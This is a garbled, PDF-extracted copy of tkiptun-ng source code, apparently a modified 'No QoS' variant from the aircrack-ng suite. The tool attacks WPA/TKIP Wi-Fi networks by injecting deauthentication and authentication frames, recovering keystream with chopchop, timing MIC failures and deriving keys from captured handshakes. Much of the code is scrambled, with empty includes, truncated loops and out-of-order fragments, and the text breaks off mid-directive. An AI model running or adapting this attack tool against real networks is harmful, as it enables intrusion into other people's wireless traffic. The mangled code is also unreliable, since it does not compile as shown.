Tkiptun-ng No QoS


/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */

802.11 WPA replay & injection attacks Copyright (C) 2008, 2009 Martin Beck WEP decryption attack (chopchop) developed by KoreK This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA In addition, as a special exception, the copyright holders give permission to link the code of portions of this program with the OpenSSL library under certain conditions as described in each individual source file, and distribute linked combinations including the two. You must obey the GNU General Public License in all respects for all of the code used other than OpenSSL. * If you modify file(s) with this exception, you may extend this exception to your version of the file(s), but you are not obligated to do so. * If you do not wish to do so, delete this exception statement from your version. * If you delete this exception statement from all source files in the program, then also delete it here.

#if defined(linux) #include #endif #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include

#include #include

#include #include #include #include #include #include #include #include "version.h" "pcap.h" "osdep/osdep.h" "crypto.h"

#define ARPHRD_IEEE80211 801 #define ARPHRD_IEEE80211_PRISM 802 #define ARPHRD_IEEE80211_FULL 803 #ifndef ETH_P_80211_RAW #define ETH_P_80211_RAW 25 #endif #define RTC_RESOLUTION 8192 #define REQUESTS #define MAX_APS #define NEW_IV 1 #define RETRY 2 #define ABORT 3 #define DEAUTH_REQ \ "\xC0\x00\x3A\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \ "\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00" #define AUTH_REQ \ "\xB0\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \ "\xBB\xBB\xBB\xBB\xBB\xBB\xB0\x00\x00\x00\x01\x00\x00\x00" #define ASSOC_REQ \ "\x00\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \ "\xBB\xBB\xBB\xBB\xBB\xBB\xC0\x00\x31\x04\x64\x00" #define NULL_DATA \ "\x48\x01\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \ "\xBB\xBB\xBB\xBB\xBB\xBB\xE0\x1B" #define RTS \ "\xB4\x00\x4E\x04\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" #define RATES \ "\x01\x04\x02\x04\x0B\x16\x32\x08\x0C\x12\x18\x24\x30\x48\x60\x6C" #define PROBE_REQ \ "\x40\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xCC\xCC\xCC\xCC\xCC\xCC" \ "\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00" #define PCT { struct tm *lt; time_t tc = time( NULL ); \ lt = localtime( &tc ); printf( "%02d:%02d:%02d ", \ lt->tm_hour, lt->tm_min, lt->tm_sec ); } #define RATE_NUM 12 30 20

#define #define #define #define #define #define #define #define #define #define #define #define

RATE_1M 1000000 RATE_2M 2000000 RATE_5_5M 5500000 RATE_11M 11000000 RATE_6M 6000000 RATE_9M 9000000 RATE_12M 12000000 RATE_18M 18000000 RATE_24M 24000000 RATE_36M 36000000 RATE_48M 48000000 RATE_54M 54000000

#define DEFAULT_MIC_FAILURE_INTERVAL 60 static uchar ZERO[32] = "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00"; int bitrates[RATE_NUM]={RATE_1M, RATE_2M, RATE_5_5M, RATE_6M, RATE_9M, RATE_11M, RATE_12M, RATE_18M, RATE_24M, RATE_36M, RATE_48M, RATE_54M}; extern char * getVersion(char * progname, int maj, int min, int submin, int svnr ev, int beta); extern char * searchInside(const char * dir, const char * filename); extern int maccmp(unsigned char *mac1, unsigned char *mac2); extern unsigned char * getmac(char * macAddress, int strict, unsigned char * mac ); extern int check_crc_buf( unsigned char *buf, int len ); extern const unsigned long int crc_tbl[256]; extern const unsigned char crc_chop_tbl[256][4]; extern int hexStringToHex(char* in, int length, unsigned char* out); char usage[] = "\n" " %s - (C) 2008, 2009 Thomas d\'Otreppe\n" " http://www.aircrack-ng.org\n" "\n" " usage: tkiptun-ng \n" "\n" " Filter options:\n" "\n" " -d dmac : MAC address, Destination\n" " -s smac : MAC address, Source\n" " -m len : minimum packet length (default: 80) \n" " -n len : maximum packet length (default: 80)\n" " -t tods : frame control, To DS bit\n" " -f fromds : frame control, From DS bit\n" " -D : disable AP detection\n" " -Z : select packets manually\n" "\n" " Replay options:\n" "\n" " -x nbpps : number of packets per second\n" " -a bssid : set Access Point MAC address\n"

" -c dmac : set Destination MAC address\n" " -h smac : set Source MAC address\n" " -e essid : set target AP SSID\n" " -M sec : MIC error timout in seconds [60]\n" "\n" " Debug options:\n" "\n" " -K prga : keystream for continuation\n" " -y file : keystream-file for continuation\n" " -j : inject FromDS packets\n" " -P pmk : pmk for verification/vuln testing\n" " -p psk : psk to calculate pmk with essid\n" "\n" " source options:\n" "\n" " -i iface : capture packets from this interface\n" " -r file : extract packets from this pcap file\n" "\n" " --help : Displays this usage screen\n" "\n"; struct WPA_hdsk { unsigned char stmac[6]; */ unsigned char snonce[32]; */ unsigned char anonce[32]; */ unsigned char keymic[16]; */ unsigned char eapol[256]; */ int eapol_size; */ int keyver; AES) */ int state; */ }; struct options { unsigned char f_bssid[6]; unsigned char f_dmac[6]; unsigned char f_smac[6]; int f_minlen; int f_maxlen; int f_minlen_set; int f_maxlen_set; int f_type; int f_subtype; int f_tods; int f_fromds; int f_iswep; FILE *f_ivs; int r_nbpps; int r_fctrl; /* output ivs file */

/* supplicant MAC /* supplicant nonce /* authenticator nonce /* eapol frame MIC /* eapol frame contents /* eapol frame size /* key version (TKIP / /* handshake completion

unsigned char r_bssid[6]; unsigned char r_dmac[6]; unsigned char r_smac[6]; unsigned char r_apmac[6]; unsigned char r_dip[4]; unsigned char r_sip[4]; char r_essid[33]; int r_fromdsinj; char r_smac_set; char ip_out[16]; char ip_in[16]; int port_out; int port_in; char *iface_out; char *s_face; char *s_file; uchar *prga; int a_mode; int a_count; int a_delay; int ringbuffer; int ghost; int prgalen; int delay; int npackets; int fast; int bittest; int nodetect; unsigned char oldkeystream[2048]; /* user-defined old keystream */ int oldkeystreamlen; /* user-defined old keystream length */ char wpa_essid[256]; /* essid used for calculating the pmk out of the psk */ char psk[128]; uchar pmk[128]; uchar ptk[80]; ndshake */ uchar ip_cli[4]; uchar ip_ap[4]; int got_ptk; int got_pmk; int got_psk; int got_mic_fromds; int got_mic_tods; int got_ip_ap; int got_ip_client; /* shared passphrase among the clients */ /* pmk derived from the essid and psk */ /* ptk calculated from all pieces captured in the ha //16 for 15 chars + \x00

struct WPA_hdsk wpa; /* valid WPA handshake data */ struct WPA_ST_info wpa_sta; /* used to calculate the pmk */ time_t wpa_time; /* time when the wpa handshake arrived */ unsigned char *chopped_from_plain; P */ /* chopped plaintext packet from the A

unsigned char *chopped_to_plain; */ unsigned char *chopped_from_prga; unsigned char *chopped_to_prga; int chopped_from_plain_len; int chopped_to_plain_len; int chopped_from_prga_len; int chopped_to_prga_len; struct timeval last_mic_failure; int mic_failure_interval; } opt; struct devices { int fd_in, arptype_in; int fd_out, arptype_out; int fd_rtc; unsigned char mac_in[6]; unsigned char mac_out[6]; int int int int int is_wlanng; is_hostap; is_madwifi; is_madwifing; is_bcm43xx;

/* chopped plaintext packet to the AP /* chopped keystream from the AP */ /* chopped keystream to the AP */

/* timestamp of last mic failure */ /* time between allowed mic failures */

FILE *f_cap_in; struct pcap_file_header pfh_in; } dev; static struct wif *_wi_in, *_wi_out; struct ARP_req { unsigned char *buf; int hdrlen; int len; }; struct APt { unsigned char set; unsigned char found; unsigned char len; unsigned char essid[255]; unsigned char bssid[6]; unsigned char chan; unsigned int ping[REQUESTS]; int pwr[REQUESTS]; }; struct APt ap[MAX_APS]; unsigned long nb_pkt_sent; unsigned char h80211[4096];

unsigned char tmpbuf[4096]; unsigned char srcbuf[4096]; char strbuf[512]; uchar ska_auth1[] 0\x00\x00" 0"; uchar ska_auth3[4096] = "\xb0\x40\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00" "\x00\x00\x00\x00\x00\x00\xc0\x01"; int ctrl_c, alarmed; char * iwpriv; unsigned char noQOS[4096]; // Este ser el buffer temporal para forjar paquetes Q oS si no est habilitado void sighandler( int signum ) { if( signum == SIGINT ) ctrl_c++; if( signum == SIGALRM ) alarmed++; } int reset_ifaces() { //close interfaces if(_wi_in != _wi_out) { if(_wi_in) { wi_close(_wi_in); _wi_in = NULL; } if(_wi_out) { wi_close(_wi_out); _wi_out = NULL; } } else { if(_wi_out) { wi_close(_wi_out); _wi_out = NULL; _wi_in = NULL; } } /* open the replay interface */ _wi_out = wi_open(opt.iface_out); if (!_wi_out) return 1; = "\xb0\x00\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 "\x00\x00\x00\x00\x00\x00\xb0\x01\x01\x00\x01\x00\x00\x0

dev.fd_out = wi_fd(_wi_out); /* open the packet source */ if( opt.s_face != NULL ) { _wi_in = wi_open(opt.s_face); if (!_wi_in) return 1; dev.fd_in = wi_fd(_wi_in); wi_get_mac(_wi_in, dev.mac_in); } else { _wi_in = _wi_out; dev.fd_in = dev.fd_out; /* XXX */ dev.arptype_in = dev.arptype_out; wi_get_mac(_wi_in, dev.mac_in); } wi_get_mac(_wi_out, dev.mac_out); return 0; } int set_bitrate(struct wif *wi, int rate) { int i, newrate; if( wi_set_rate(wi, rate) ) return 1; // // d if (rate == 5500000 && wi_get_rate(wi) != 5500000) { if( wi_set_rate(wi, 5000000) ) return 1; } newrate = wi_get_rate(wi); for(i=0; i0 ) { if(bitrates[i-1] >= newrate) { printf("Couldn't set rate to %.1fMBit. (%.1fMBit instead)\n" if( reset_ifaces() ) return 1; //Workaround for buggy drivers (rt73) that do not accept 5.5M, but 5M instea

, (rate/1000000.0), (wi_get_rate(wi)/1000000.0)); return 1; } } if( i 1) { z += 2; //skip ethertype /* frame 1: Pairwise == 1, Install == 0, Ack == 1, MIC == 0 */ if( ( packet[z + 6] & 0x08 ) != 0 && ( packet[z + 6] & 0x40 ) == 0 ( packet[z + 6] & 0x80 ) != 0 ( packet[z + 5] & 0x01 ) == 0 { memcpy( opt.wpa.anonce, &packet[z opt.wpa.state = 1; } && && ) + 17], 32 );

/* frame 2 or 4: Pairwise == 1, Install == 0, Ack == 0, MIC == 1 */ if( z+17+32 > length ) return 0; if( ( packet[z + 6] & 0x08 ) != 0 && ( packet[z + 6] & 0x40 ) == 0 && ( packet[z + 6] & 0x80 ) == 0 && ( packet[z + 5] & 0x01 ) != 0 ) { if( memcmp( &packet[z + 17], ZERO, 32 ) != 0 ) { memcpy( opt.wpa.snonce, &packet[z + 17], 32 ); opt.wpa.state |= 2; } if( (opt.wpa.state & 4) != 4 ) { opt.wpa.eapol_size = ( packet[z + 2] 4; } if (wi_write(wi, buf, count, NULL) == -1) { switch (errno) { case EAGAIN: case ENOBUFS: usleep(10000); return 0; /* XXX not sure I like this... -sorbo */ } perror("wi_write()"); return -1; } nb_pkt_sent++; return 0; } int read_packet(void *buf, size_t count, struct rx_info *ri)

{ struct wif *wi = _wi_in; /* XXX */ int rc; rc = wi_read(wi, buf, count, ri); if (rc == -1) { switch (errno) { case EAGAIN: return 0; } perror("wi_read()"); return -1; } return rc; } void read_sleep( int usec ) { struct timeval tv, tv2, tv3; int caplen; fd_set rfds; gettimeofday(&tv, NULL); gettimeofday(&tv2, NULL); tv3.tv_sec=0; tv3.tv_usec=10000; while( ((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec )) < (usec) ) { FD_ZERO( &rfds ); FD_SET( dev.fd_in, &rfds ); if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv3 ) < 0 ) { continue; } if( FD_ISSET( dev.fd_in, &rfds ) ) { caplen = read_packet( h80211, sizeof( h80211 ), NULL ); check_received(h80211, caplen); } usleep(1000); gettimeofday(&tv2, NULL); } } int filter_packet( unsigned char *h80211, int caplen ) { int z, mi_b, mi_s, mi_d, ext=0, qos=0; if(caplen opt.f_maxlen ) return( 1 ); /* check the frame control bytes */ // // if( ( h80211[0] & 0x80 ) != 0x80 ) return( 1 ); //no QoS packet if( ( h80211[0] & 0x0C ) != ( opt.f_type opt.f_type >= 0 ) return( 1 ); = 0 ) return( 1 ); ) &&

if( ( h80211[1] & 0x02 ) != ( opt.f_fromds = 0 ) return( 1 ); if( ( h80211[1] & 0x40 ) != ( opt.f_iswep opt.f_iswep >= 0 ) return( 1 ); /* check the extended IV (TKIP) flag */ // // if( opt.f_type == 2 && opt.f_iswep == 1 && ( h80211[z + 3] & 0x20 ) != 0 ) return( 1 ); /* MAC address checking */ switch( h80211[1] { case 0: mi_b case 1: mi_b case 2: mi_b default: mi_b } & 3 ) = = = = 16; 4; 10; 10; mi_s mi_s mi_s mi_d = = = = 10; 10; 16; 16; mi_d mi_d mi_d mi_s = = = = 4; 16; 4; 24; break; break; break; break; 100 00*1000) //wait 10sec for beacon frame { return -1; } if(len len) continue; chan = pkt_sniff[pos+2]; if(essid) { pos = 0; taglen = 22; arted taglen+= 12; //skip fixed tags in frames do { pos += taglen + 2; tagtype = pkt_sniff[pos]; taglen = pkt_sniff[pos+1]; } while(tagtype != 0 && pos < len-2); if(tagtype != 0) continue; if(taglen len) continue; if(taglen > 32)taglen = 32; if((pkt_sniff+pos+2)[0] < 32 && memcmp(bssid, pkt_sniff+10, 6) = = 0) { break; } /* if bssid is given, copy essid */ if(bssid != NULL && memcmp(bssid, pkt_sniff+10, 6) == 0 && strle n(essid) == 0) { memset(essid, 0, 33); memcpy(essid, pkt_sniff+pos+2, taglen); break; } /* if essid is given, copy bssid AND essid, so we can handle cas e insensitive arguments */ if(bssid != NULL && memcmp(bssid, NULL_MAC, 6) == 0 && strncasec mp(essid, (char*)pkt_sniff+pos+2, taglen) == 0 && strlen(essid) == (unsigned)tag len) { memset(essid, 0, 33); memcpy(essid, pkt_sniff+pos+2, taglen); memcpy(bssid, pkt_sniff+10, 6); printf("Found BSSID \"%02X:%02X:%02X:%02X:%02X:%02X\" to giv en ESSID \"%s\".\n", bssid[0], bssid[1], bssid[2], bssid[3], bssid[4], bssid[5], essid); break; }

//initial value to get the fixed tags parsing st

/* if essid and bssid are given, check both */ if(bssid != NULL && memcmp(bssid, pkt_sniff+10, 6) == 0 && strle n(essid) > 0) { memset(essid2, 0, 33); memcpy(essid2, pkt_sniff+pos+2, taglen); if(strncasecmp(essid, essid2, taglen) == 0 && strlen(essid) == (unsigned)taglen) break; else { printf("For the given BSSID \"%02X:%02X:%02X:%02X:%02X:% 02X\", there is an ESSID mismatch!\n", bssid[0], bssid[1], bssid[2], bssid[3], b ssid[4], bssid[5]); printf("Found ESSID \"%s\" vs. specified ESSID \"%s\"\n" , essid2, essid); printf("Using the given one, double check it to be sure its correct!\n"); break; } } } } } if(capa) memcpy(capa, pkt_sniff+34, 2); return chan; } /* if bssid != NULL its looking for a beacon frame */ int attack_check(uchar* bssid, char* essid, uchar* capa, struct wif *wi) { int ap_chan=0, iface_chan=0; iface_chan = wi_get_channel(wi); if(bssid != NULL) { ap_chan = wait_for_beacon(bssid, capa, essid); if(ap_chan < 0) { PCT; printf("No such BSSID available.\n"); return -1; } if(ap_chan != iface_chan) { PCT; printf("%s is on channel %d, but the AP uses channel %d\n", wi_ get_ifname(wi), iface_chan, ap_chan); return -1; } } return 0; } int getnet( uchar* capa, int filter, int force)

{ unsigned char *bssid; if(opt.nodetect) return 0; if(filter) bssid = opt.f_bssid; else bssid = opt.r_bssid; if( memcmp(bssid, NULL_MAC, 6) ) { PCT; printf("Waiting for beacon frame (BSSID: %02X:%02X:%02X:%02X:%02X:% 02X) on channel %d\n", bssid[0],bssid[1],bssid[2],bssid[3],bssid[4],bssid[5],wi_get _channel(_wi_in)); } else if(strlen(opt.r_essid) > 0) { PCT; printf("Waiting for beacon frame (ESSID: %s) on channel %d\n", opt. r_essid,wi_get_channel(_wi_in)); } else if(force) { PCT; if(filter) { printf("Please specify at least a BSSID (-b) or an ESSID (-e)\n"); } else { printf("Please specify at least a BSSID (-a) or an ESSID (-e)\n"); } return( 1 ); } else return 0; if( attack_check(bssid, opt.r_essid, capa, _wi_in) != 0) { if(memcmp(bssid, NULL_MAC, 6)) { if( strlen(opt.r_essid) == 0 || opt.r_essid[0] < 32) { printf( "Please specify an ESSID (-e).\n" ); } } if(!memcmp(bssid, NULL_MAC, 6)) { if(strlen(opt.r_essid) > 0) { printf( "Please specify a BSSID (-a).\n" ); } } return( 1 ); }

return 0; } int xor_keystream(uchar *ph80211, uchar *keystream, int len) { int i=0; for (i=0; i 0 ) { tr = time( NULL ); printf( "\rRead %ld packets...\r", nb_pkt_read ); fflush( stdout ); } if( opt.s_file == NULL ) { FD_ZERO( &rfds ); FD_SET( dev.fd_in, &rfds ); tv.tv_sec = 1; tv.tv_usec = 0; if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv ) < 0 )

{ if( errno == EINTR ) continue; perror( "select failed" ); return( 1 ); } if( ! FD_ISSET( dev.fd_in, &rfds ) ) continue; gettimeofday( &tv, NULL ); *caplen = read_packet( h80211, sizeof( h80211 ), NULL ); if( *caplen < 0 ) return( 1 ); if( *caplen == 0 ) continue; } else { /* there are no hidden backdoors in this source code */ n = sizeof( pkh ); if( fread( &pkh, n, 1, dev.f_cap_in ) != 1 ) { printf( "\r\33[KEnd of file.\n" ); return( 1 ); } if( dev.pfh_in.magic == TCPDUMP_CIGAM ) SWAP32( pkh.caplen ); tv.tv_sec = pkh.tv_sec; tv.tv_usec = pkh.tv_usec; n = *caplen = pkh.caplen; if( n (int) sizeof( h80211 ) || n > (int) sizeof( tmpbuf ) ) { printf( "\r\33[KInvalid packet length %d.\n", n ); return( 1 ); } if( fread( h80211, n, 1, dev.f_cap_in ) != 1 ) { printf( "\r\33[KEnd of file.\n" ); return( 1 ); } if( dev.pfh_in.linktype == LINKTYPE_PRISM_HEADER ) { if( h80211[7] == 0x40 ) n = 64; else n = *(int *)( h80211 + 4 ); if( n < 8 || n >= (int) *caplen ) continue; memcpy( tmpbuf, h80211, *caplen );

*caplen -= n; memcpy( h80211, tmpbuf + n, *caplen ); } } nb_pkt_read++; if( filter_packet( h80211, *caplen ) != 0 ) continue; if(opt.fast) break; z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30; if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */ z+=2; switch( h80211[1] { case 0: mi_b case 1: mi_b case 2: mi_b case 3: mi_t ak; // WDS packet } & 3 ) = = = = 16; 4; 10; 10; mi_s mi_s mi_s mi_r = = = = 10; 10; 16; 4; mi_d mi_d mi_d mi_d = = = = 4; 16; 4; 16; is_wds is_wds is_wds mi_s = = 0; break; = 0; break; = 0; break; 24; is_wds = 1; bre

printf( "\n\n Size: %d, FromDS: %d, ToDS: %d", *caplen, ( h80211[1] & 2 ) >> 1, ( h80211[1] & 1 ) ); if( ( h80211[0] & 0x0C ) == 8 && ( h80211[1] & 0x40 ) != 0 ) { // if (is_wds) key_index_offset = 33; // WDS packets have an additio nal MAC, so the key index is at byte 33 // else key_index_offset = 27; key_index_offset = z+3; if( ( h80211[key_index_offset] & 0x20 ) == 0 ) printf( " (WEP)" ); else printf( " (WPA)" ); } printf( "\n\n" ); if (is_wds) { printf( " Transmitter = %02X:%02X:%02X:%02X:%02X:%02X\n", h80211[mi_t ], h80211[mi_t + 1], h80211[mi_t + 2], h80211[mi_t + 3], h80211[mi_t + 4], h80211[mi_t + 5] ); printf( " h80211[mi_r h80211[mi_r h80211[mi_r } else { printf( " h80211[mi_b h80211[mi_b h80211[mi_b } Receiver = %02X:%02X:%02X:%02X:%02X:%02X\n", ], h80211[mi_r + 1], + 2], h80211[mi_r + 3], + 4], h80211[mi_r + 5] ); BSSID = %02X:%02X:%02X:%02X:%02X:%02X\n", ], h80211[mi_b + 1], + 2], h80211[mi_b + 3], + 4], h80211[mi_b + 5] );

printf( " Dest. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n", h80211[mi_d ], h80211[mi_d + 1], h80211[mi_d + 2], h80211[mi_d + 3], h80211[mi_d + 4], h80211[mi_d + 5] ); printf( " Source MAC = %02X:%02X:%02X:%02X:%02X:%02X\n", h80211[mi_s ], h80211[mi_s + 1], h80211[mi_s + 2], h80211[mi_s + 3], h80211[mi_s + 4], h80211[mi_s + 5] ); /* print a hex dump of the packet */ for( i = 0; i < *caplen; i++ ) { if( ( i & 15 ) == 0 ) { if( i == 224 ) { printf( "\n --- CUT ---" ); break; } printf( "\n } printf( "%02x", h80211[i] ); if( ( i & 1 ) != 0 ) printf( " " ); if( i == *caplen - 1 && ( ( i + 1 ) & 15 ) != 0 ) { for( j = ( ( i + 1 ) & 15 ); j < 16; j++ ) { printf( " " ); if( ( j & 1 ) != 0 ) printf( " " ); } printf( " " ); for( j = 16 - ( ( i + 1 ) & 15 ); j < 16; j++ ) printf( "%c", ( h80211[i - 15 + j] < 32 || h80211[i - 15 + j] > 126 ) ? '.' : h80211[i - 15 + j] ); } if( i > 0 && ( ( i + 1 ) & 15 ) == 0 ) { printf( " " ); for( j = 0; j < 16; j++ ) printf( "%c", ( h80211[i - 15 + j] < 32 || h80211[i - 15 + j] > 127 ) ? '.' : h80211[i - 15 + j] ); } } printf( "\n\nUse this packet ? " ); 0x%04x: ", i );

fflush( stdout ); ret=0; while(!ret) ret = scanf( "%s", tmpbuf ); printf( "\n" ); if( tmpbuf[0] == 'y' || tmpbuf[0] == 'Y' ) break; } if(!just_grab) { pfh_out.magic pfh_out.version_major pfh_out.version_minor pfh_out.thiszone pfh_out.sigfigs pfh_out.snaplen pfh_out.linktype

= = = = = = =

TCPDUMP_MAGIC; PCAP_VERSION_MAJOR; PCAP_VERSION_MINOR; 0; 0; 65535; LINKTYPE_IEEE802_11;

lt = localtime( (const time_t *) &tv.tv_sec ); memset( strbuf, 0, sizeof( strbuf ) ); snprintf( strbuf, sizeof( strbuf ) - 1, "replay_src-%02d%02d-%02d%02d%02d.cap", lt->tm_mon + 1, lt->tm_mday, lt->tm_hour, lt->tm_min, lt->tm_sec ); printf( "Saving chosen packet in %s\n", strbuf ); if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL ) { perror( "fopen failed" ); return( 1 ); } n = sizeof( struct pcap_file_header ); if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 ) { perror( "fwrite failed\n" ); return( 1 ); } pkh.tv_sec pkh.tv_usec pkh.caplen pkh.len = = = = tv.tv_sec; tv.tv_usec; *caplen; *caplen;

n = sizeof( pkh ); if( fwrite( &pkh, n, 1, f_cap_out ) != 1 ) { perror( "fwrite failed" ); return( 1 ); } n = pkh.caplen; if( fwrite( h80211, n, 1, f_cap_out ) != 1 ) {

perror( "fwrite failed" ); return( 1 ); } fclose( f_cap_out ); } return( 0 ); } int read_prga(unsigned char **dest, char *file) { FILE *f; int size; if(file == NULL) return( 1 ); if(*dest == NULL) *dest = (unsigned char*) malloc(1501); f = fopen(file, "r"); if(f == NULL) { printf("Error opening %s\n", file); return( 1 ); } fseek(f, 0, SEEK_END); size = ftell(f); rewind(f); if(size > 1500) size = 1500; if( fread( (*dest), size, 1, f ) != 1 ) { fprintf( stderr, "fread failed\n" ); return( 1 ); } opt.prgalen = size; fclose(f); return( 0 ); } void add_icv(uchar *input, int len, int offset) { unsigned long crc = 0xFFFFFFFF; int n=0; for( n = offset; n < len; n++ ) crc = crc_tbl[(crc ^ input[n]) & 0xFF] ^ (crc >> 8); crc = ~crc; input[len] input[len+1] input[len+2] input[len+3] return; = = = = (crc ) & (crc >> 8) & (crc >> 16) & (crc >> 24) & 0xFF; 0xFF; 0xFF; 0xFF;

} void send_fragments(uchar *packet, int packet_len, uchar *iv, uchar *keystream, int fragsize, int ska) { int t, u; int data_size; uchar frag[32+fragsize]; int pack_size; int header_size=24; data_size = packet_len-header_size; packet[23] = (rand() % 0xFF); for (t=0; t+=fragsize;) { //Copy header memcpy(frag, packet, header_size); //Copy IV + KeyIndex memcpy(frag+header_size, iv, 4); //Copy data if(fragsize =data_size) frag[1] &= 251; //Fragment number frag[22] = 0; for (u=t; u-=fragsize;) { frag[22] += 1; } // frag[23] = 0; //Calculate packet lenght if(fragsize 0 && i%16 == 0)printf("\n"); printf("%02X ", packet[i]); } printf("\n\n"); } int check_guess(uchar *srcbuf, uchar *chopped, int caplen, int clearlen, uchar * arp, uchar *dmac) { int i, j, z, pos; z = ( ( srcbuf[1] & 3 ) != 3 ) ? 24 : 30; if ( ( srcbuf[0] & 0x80 ) == 0x80 ) /* QoS */ z+=2; // if(arp[22] == 192 && arp[23] == 168 && arp[24] == 178 && arp[25] == 1) // { // printf("Source: %i.%i.%i.%i; Dest: %i.%i.%i.%i\n", // arp[22], arp[23], arp[24], arp[25], arp[32], arp[33], arp[34] , arp[35] ); // } pos = caplen-z-8-clearlen; for(i=0; i 1024 || ret != 1 ) {

printf( "Invalid number of packets per second. [1-1024]\n" ) ; printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } break; case 'a' : if( getmac( optarg, 1, opt.r_bssid ) != { printf( "Invalid AP MAC address.\n" printf("\"%s --help\" for help.\n", return( 1 ); } if( getmac( optarg, 1, opt.f_bssid ) != { printf( "Invalid AP MAC address.\n" printf("\"%s --help\" for help.\n", return( 1 ); } break; case 'c' : if( getmac( optarg, 1, opt.r_dmac ) != 0 ) { printf( "Invalid destination MAC address.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } break; case 'h' : if( getmac( optarg, 1, opt.r_smac ) != 0 ) { printf( "Invalid source MAC address.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } if( getmac( optarg, 1, opt.wpa.stmac ) != 0 ) { printf( "Invalid source MAC address.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } opt.r_smac_set=1; break; case 'e' : memset( opt.r_essid, 0, sizeof( opt.r_essid ) ); strncpy( opt.r_essid, optarg, sizeof( opt.r_essid ) - 1 ); break; case 'j' : opt.r_fromdsinj = 1; break; 0 ) ); argv[0]); 0 ) ); argv[0]);

case 'D' : opt.nodetect = 1; break; case 'y' : if( opt.prga != NULL ) { printf( "PRGA file already specified.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } if( read_prga(&(opt.prga), optarg) != 0 ) { return( 1 ); } break; case 'i' : if( opt.s_face != NULL || opt.s_file ) { printf( "Packet source already specified.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } opt.s_face = optarg; opt.port_in = get_ip_port(opt.s_face, opt.ip_in, sizeof(opt.ip_i n)-1); break; case 'r' : if( opt.s_face != NULL || opt.s_file ) { printf( "Packet source already specified.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } opt.s_file = optarg; break; case 'Z' : opt.fast = 0; break; case 'H' : printf( usage, getVersion("Tkiptun-ng", _MAJ, _MIN, _SUB_MIN, _R EVISION, _BETA) ); return( 1 ); case 'K' : i = 0 ; n = 0; s = optarg;

while( s[i] != '\0' ) { if ( s[i] == '-' || s[i] == ':' || s[i] == ' ') i++; else s[n++] = s[i++]; } s[n] = '\0' ; buf[0] = s[0]; buf[1] = s[1]; buf[2] = '\0'; i = 0; j = 0; while( sscanf( buf, "%x", &n ) == 1 ) { if ( n < 0 || n > 255 ) { printf( "Invalid keystream.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } opt.oldkeystream[opt.oldkeystreamlen] = n ; opt.oldkeystreamlen++; if( i >= 64 ) break; s += 2; buf[0] = s[0]; buf[1] = s[1]; } break; case 'P' : memset( opt.pmk, 0, sizeof( opt.pmk ) ); i = hexStringToHex(optarg, strlen(optarg), opt.pmk); opt.got_pmk = 1; break; case 'p' : memset( opt.psk, 0, sizeof( opt.psk ) ); if( strlen(optarg) < 8 || strlen(optarg) > 63) { printf("PSK with invalid length specified [8-64].\n"); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } strncpy( opt.psk, optarg, sizeof( opt.psk ) - 1 ); opt.got_psk = 1; break; case 'M' : ret = sscanf( optarg, "%d", &opt.mic_failure_interval ); if( opt.mic_failure_interval < 0 ) { printf( "Invalid MIC error timeout. [>=0]\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } break;

default : goto usage; } } if( argc - optind != 1 ) { if(argc == 1) { usage: printf( usage, getVersion("Tkiptun-ng", _MAJ, _MIN, _SUB_MIN, _R EVISION, _BETA) ); } if( argc - optind == 0) { printf("No replay interface specified.\n"); } if(argc > 1) { printf("\"%s --help\" for help.\n", argv[0]); } return( 1 ); } if( !opt.r_smac_set ) { printf( "A Client MAC must be specified (-h).\n"); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } if( (opt.f_minlen > 0 && opt.f_maxlen > 0) && opt.f_minlen > opt.f_maxlen ) { printf( "Invalid length filter (min(-m):%d > max(-n):%d).\n", opt.f_minlen, opt.f_maxlen ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } if ( opt.f_tods == 1 && opt.f_fromds == 1 ) { printf( "FromDS and ToDS bit are set: packet has to come from the AP and go to the AP\n" ); } dev.fd_rtc = -1; /* open the RTC device if necessary */ #if 